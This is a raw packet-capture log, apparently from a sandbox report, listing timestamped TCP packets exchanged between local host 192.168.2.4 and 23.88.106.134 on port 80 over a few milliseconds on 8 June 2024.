Jun 8, 2024 20:22:06.918859959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918869972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918876886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918894053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918895006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918895006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918910027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918910980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918929100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918939114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918945074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918950081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918960094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918971062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918977022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.918982983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.918994904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919004917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919004917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919012070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919038057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919054985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919305086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919322014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919337988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919353008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919353962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919362068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919370890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919372082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919388056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919401884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919413090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919425011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919425011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919430017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919450045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919456959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919466019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919466972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919483900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919485092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919501066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919507980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919517994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919518948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919536114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919548988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919552088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919569016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919570923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919570923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919586897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919594049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919603109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919604063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919619083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919629097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919634104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919636965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919651031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919661045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919666052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.919676065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919694901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.919704914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920317888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920334101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920347929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920362949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920373917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920378923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920396090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920399904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920418978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920425892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920435905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920448065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920450926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920468092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920470953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920499086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920500994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920515060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920520067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920538902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920551062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920833111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920849085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920864105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920880079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920888901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920898914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920903921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920921087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920924902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920934916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920948982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920952082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920963049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920969009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920979977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.920985937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.920999050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921003103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921020031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921021938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921042919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921042919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921042919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921060085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921070099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921076059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921081066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921093941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921104908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921111107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921116114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921125889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921138048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921144009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921154976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921159983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921173096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921176910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921190023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921194077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921210051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921227932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921241045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921729088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921746016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921761036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921776056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921777964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921789885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921791077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921808004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921808958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921823978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921824932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921842098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921842098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921864033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921885014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921889067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921905041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921920061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921935081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921935081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921947002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921952009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921966076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921967030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921982050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.921987057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.921998978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922004938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922017097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922020912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922039032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922039986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922049999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922055006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922070980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922080994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922091007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922096014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922106028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922122955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922138929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922700882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922717094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922732115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922749043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922749043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922758102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922764063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922780991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922780991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922795057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922799110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922811031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922817945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922821045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.922835112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922853947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.922868967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923113108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923136950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923151016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923163891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923167944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923176050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923185110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923199892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923201084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923211098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923217058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923232079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923234940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923245907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923250914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923268080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923269987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923278093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923284054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923300028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923300982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923310995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923316956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923331976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923332930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923348904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923351049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923365116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923366070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923382998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923393965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923398972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923414946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923418999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923430920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923438072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923446894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923461914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923491955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.923860073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.923907995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924084902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924101114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924114943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924130917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924133062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924141884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924146891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924163103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924163103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924179077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924181938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924195051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924207926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924211025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924228907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924232960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924245119 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924257994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924262047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924278975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924284935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924294949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924307108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924312115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924329042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924331903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924345016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924345016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924360991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924374104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924379110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924395084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924396038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924412966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924439907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924941063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924957037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924971104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924987078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.924989939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.924998999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925000906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925018072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925021887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925034046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925040007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925050020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925065994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925066948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925091982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925113916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925327063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925343037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925359011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925376892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925383091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925385952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925398111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925410032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925415039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925430059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925431967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925437927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925448895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925457001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925466061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925474882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925484896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925494909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925501108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925509930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925518036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925530910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925533056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925548077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925549984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925565958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925566912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925578117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925584078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925600052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925600052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925617933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925617933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925635099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925637007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925647020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925652981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925668955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925672054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925684929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.925694942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925718069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.925734043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926273108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926290035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926306009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926321983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926325083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926333904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926354885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926378965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926394939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926403999 CEST	49731	80	192.168.2.4	23.88.106.134
